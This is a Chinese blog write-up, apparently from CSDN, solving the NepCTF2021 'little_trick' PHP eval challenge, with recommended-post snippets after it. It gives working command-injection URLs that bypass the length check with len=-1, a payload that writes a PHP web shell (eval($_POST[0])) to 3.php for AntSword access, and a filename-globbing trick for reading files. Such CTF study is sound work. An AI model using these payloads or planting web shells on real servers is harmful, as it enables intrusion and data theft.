NepCTF2021 little_trick

最新推荐文章于 2021-03-29 21:17:50 发布
最新推荐文章于 2021-03-29 21:17:50 发布
阅读量287 收藏 2
点赞数
分类专栏: NepCTF ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jvkyvly/article/details/115142160
版权
ctf 同时被 2 个专栏收录
31 篇文章 1 订阅
订阅专栏
NepCTF
2 篇文章 0 订阅
订阅专栏

题目

<?php
    error_reporting(0);
    highlight_file(__FILE__);
    $nep = $_GET['nep'];
    $len = $_GET['len'];
    if(intval($len)<8 && strlen($nep)<13){
        eval(substr($nep,0,$len));
    }else{
        die('too long!');
    }
?>

url?nep=`ls>1`;&len=7
访问url/1
得到
1
index.php
nepctf.php

然后有个骚姿势,让len= -1绕过intval($len)<8,让我们的payload可以更长,

substr($nep,0,-1)是从0取到倒数第二位
substr("abcdef",0,-1)得到"abcd"

然后payload

url?nep=`cat n*>1`;a&len=-1

然后访问url/1得到flag,最后那个a是用来填充的,因为substr取到倒数第二位,上面说了。

法二
feng师傅的payload
我直接膜拜

?len=7;echo%20%27<?php%20eval($_POST[0]);?>%27%20>%203.php;&nep=`$len`;

利用php的类型转换,无论是intval还是substr,那里处理的都是前面的数字7,但是真正命令执行的却是整个len变量。

然后蚁剑连接。

法三

前面和法一 一样
这需要重新开一次靶机

url/?nep=`>cat`;&len=7
url/?nep=`*>1`;&len=7

这里*>1等价于cat index.php nepctf.php> 1,linux小trick记住就好,因为linux文件系统默认从数字小写字母到大写字母升序排列

Je3Z
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
nepctf2021
SopRomeo的博客
03-25 850
web little_trick 非常简单的命令执行绕过 substr(0,-1)从最后开始过, echo`nl%20*`; 梦里花开牡丹亭 <?php highlight_file(__FILE__); error_reporting(0); include('shell.php'); class Game{ public $username; public $password; public $choice; public $register;
CTF中Web各种题目的解题姿势
05-25
Web题型是CTF中常考题型之一,它将实际渗透过程中的技术技巧转化为CTF赛题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
ctf web方向与php学习记录34之[RoarCTF 2019]Easy Calc第一次复现尝试(2)
这周末在做梦的博客
03-29 215
本期主要关注复现一,linux与windows中搭建phpstudy的区别1 以下是该题的源码。2题目的pl如下:3以下是该题的所有文件以及源码:4详细说明二,[RoarCTF 2019]Easy Calc复现1复现过程二级目录三级目录 一,linux与windows中搭建phpstudy的区别 首先,想要了解清楚在这两种系统搭建网站的区别就要熟悉你想要实现的网站的功能,其次就是二者命令执行的区别。 (其实说到这里,大佬们可能就清楚本小白要讲的内容了)。 这里就用nepctf的一道【little trick
NepCTF web-little_trick
qq_34097497的博客
03-22 599
NepCTF web-little_trick 小白第一次写write up大佬别喷 0x01 原理分析 题目分析 题目中主要考察eval 利用 打开PHP手册 当len参数为 -1时,可以构造最多12个字符,回想到之前学习到的eval长度限制绕过 0x02 漏洞利用 ps:反引号`` 内的字符串,也会被解析成OS 命令。 例如 <pre> <?php if(isset($_GET['cmd'])){ $cmd=$_GET['cmd']; print `$cmd`;
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
Compass_trick21r_Vc_
10-02
标题“Compass_trick21r_Vc_”暗示了这是一个与指南针或者导航相关的项目,结合描述中的“模拟压力计程序”,我们可以推测这可能是一个使用C++编程语言(Vc通常指的是Visual C++)开发的软件应用,该应用包含了模拟...
booking_trick
03-21
待办事项:删除此内容和上面的文字,并描述您的宝石安装将此行添加到您的应用程序的Gemfile中: gem 'booking_trick'然后执行: $ bundle或将其自己安装为: $ gem install booking_trick用法待办事项:在此处写下...
python_trick_中文版.pdf
06-11
python_trick_中文版.pdf
db_trick.sql
12-13
db_trick.sql
wda_monitor_trick:PoC
04-24
**标题解析:** "wda_monitor_trick:PoC" 这个标题表明这是一个关于WDA_MONITOR漏洞的证明概念(Proof of Concept,简称PoC)的项目。PoC通常是一段代码或步骤,用于演示特定安全漏洞的存在,而不一定是完整的攻击...
CTF西普实验吧记错本--WEB
Grey的博客
04-30 3264
1.看起来有点难登陆题①首先万能密码登陆看看,无果,CTF的题不会那么简单②测试过滤了哪些字符③手工注入查看有哪些注入点,盲注也试试,最后发现有布尔型注入可以自己写python脚本,也可以sqlmap自带的脚本qlmap.py --url="http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&amp;pass=1&amp;act...
php 字母数字下划线,CTF踩坑PHP编写一个不包含数字字母和下划线的后门
weixin_30282917的博客
03-11 771
首先要了解一下php中异或的用法先看以下代码echo "A"^"?";?>运行结果图片.png我们可以看到,输出的结果是字符"~"。之所以会得到这样的结果,是因为代码中对字符"A"和字符"?"进行了异或操作。在PHP中,两个变量进行异或时,先会将字符串转换成ASCII值,再将ASCII值转换成二进制再进行异或,异或完,又将结果从二进制转换成了ASCII值,再将ASCII值转换成字符串。异或操...
NepCTF2021-Web部分(除画皮)
Y4tacker的博客
03-22 3351
文章目录little_trickfaka_revengeEasy_Tomcatbbxhh_revenge非预期预期 little_trick 打开环境发现代码是这个,太简单了,签到题 <?php error_reporting(0); highlight_file(__FILE__); $nep = $_GET['nep']; $len = $_GET['len']; if(intval($len)<8 && strlen($nep)&lt
*CTF2021部分题目解题思路及exp
liucc09的博客
01-18 3087
babyheap 这是pwn里面唯一的传统heap题,使用的是新的libc2.27,chunk被free到tcache后bk位置会被写入一个地址,再次free时如果bk有这个地址会和tcache里的所有chunk挨个比较,发现一样的就报double free tcache 2,因此要再free之后把bk置零就行了。 题目第一个坑,在edit方法里面读入数据是从chunk+8的位置的开始写,也就是不让修改fd,这导致虽然有UAF,也无法很方便的实现任意地址写。解决方法为构造重叠的chunk,从而改到tcach
CTF WriteUp】2021 starCTF部分Crypto题解
cccchhhh6819的博客
01-18 4335
(打比赛感想:大佬真TM多。。。) Crypto Crypto-GuessKey 题目 from random import randint import os from flag import flag N=64 key=randint(0,2**N) print key key=bin(key)[2:].rjust(N,'0') count=0 while True: p=0 q=0 new_key='' zeros=[0] for j in range(len(key)): if key
*CTF2021部分复现
SopRomeo的博客
01-20 1427
web oh-my-note 从源码可以看出session 是经过两次随机进行设置,首先随机取得user_id,在通过user_id和提交的时间取得note_id 看到 view路由 可以发现我们可以通过这个公开页面获得note_id 网页中恰好也给到了admin 的note_id 而我们发现在my_notes 这个路由我们有两种方式看到提交的note 一种session,另一种是GET请求发送user_id 很明显,题目意思要求爆破user_id 创建用户和提交时间可能存在几毫秒的偏差 源码中采
CTF 中JS对象键值的一点小trick
a3320315的博客
02-11 404
js中的对象只能使用String类型作为键类型,所以什么别的类型传进去就要做一次toString() 案例分析 链接 同时还可以结合evoa师傅的HTTP参数传递类型差异产生的攻击面一起学习 链接 ...
NepCTF2021一些web题目的总结与复现
feng的博客
03-23 3850
前言 参加了今年的NepCTF,题目质量很好,就是周末事情比较多,而且只会php,没有全身心去做,
#ctf解题姿势#一些绕过方法
vircorns的博客
08-12 2371
绕过WAF的方法 大小写混合 小写或大写的关键字匹配技术,正则表达式/express/i 大小写敏感即无法绕过 替换关键字 大小写转化无法绕过,而且正则表达式会替换或删除select、union这些关键字,如果只匹配一次就很容易绕过 举例:?id=-15 UNIunionON SELselectECT 1,2,3,4 使用编码 URL编码 ,存在一种情况URL编码只进行了一次过滤,可以用...
import csv import matplotlib.pylab as plt import numpy as np #导入csv文件 file = 'D:\\education.csv' with open(file, encoding='utf_8', newline='') as f: data = [row for row in csv.DictReader(f)] print(data) f.close() #可视化操作 plt.rcParams["font.family"]="FangSong" #设置字体 #设置横坐标 x_trick=[] for dct in data: x_trick.append(dct.get("地区")) #设置纵坐标 #小学 y_num1=[] for n1 in data: y_num1.append(n1.get('小学')) y1 = [int(x) for x in y_num1] #初中 y_num2 = [] for n2 in data: y_num2.append(n2.get('初中')) y2 = [int(x) for x in y_num2] #高中 y_num3 = [] for n3 in data: y_num3.append(n3.get('初中')) y3 = [int(x) for x in y_num3] #大学 y_num4 = [] for n4 in data: y_num4.append(n4.get('初中')) y4 = [int(x) for x in y_num4] #无学历 count = [i+j+m+n for i,j,m,n in zip(y1, y2, y3, y4)] y0 = [100000 - i for i in count] plt.figure(figsize=(10,5)) #设置表格大小 plt.title('各地区每10完人不同教育程度的人数', loc='left', fontsize=10) x=range(0,len(x_trick)) #刻度 plt.xticks(x,x_trick) #横坐标对应位置显示的内容 #在特定的起始高度画出每条对应的柱子,并给定相应的颜色 plt.bar(x,y0,color='rad') plt.bar(x,y1, color='orange', bottom=np.array(y0)) plt.bar(x, y2, color='yellow', bottom=np.array(y0)+np.array(y1)) plt.bar(x, y3, color='green', bottom=np.array(y0)+np.array(y1)+np.array(y2)) plt.bar(x, y4, color='blue', bottom=np.array(y0)+np.array(y1)+np.array(y2)+np.array(y3)) #创建图例 plt.legend(['五', '小学', '初中', '高中(含中专)', '大学(大专及以上)'], ncol=5,bbox_to_anchor=(1.001,1.054), borderaxespad=0, fontsize=6, loc=1, ) plt.show() 请修改这段代码
最新发布
06-02
x_trick.append(dct.get("地区")) #设置纵坐标 #小学 y_num1=[] for n1 in data: y_num1.append(n1.get('小学')) y1 = [int(x) for x in y_num1] #初中 y_num2 = [] for n2 in data: y_num2.append(n2.get...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值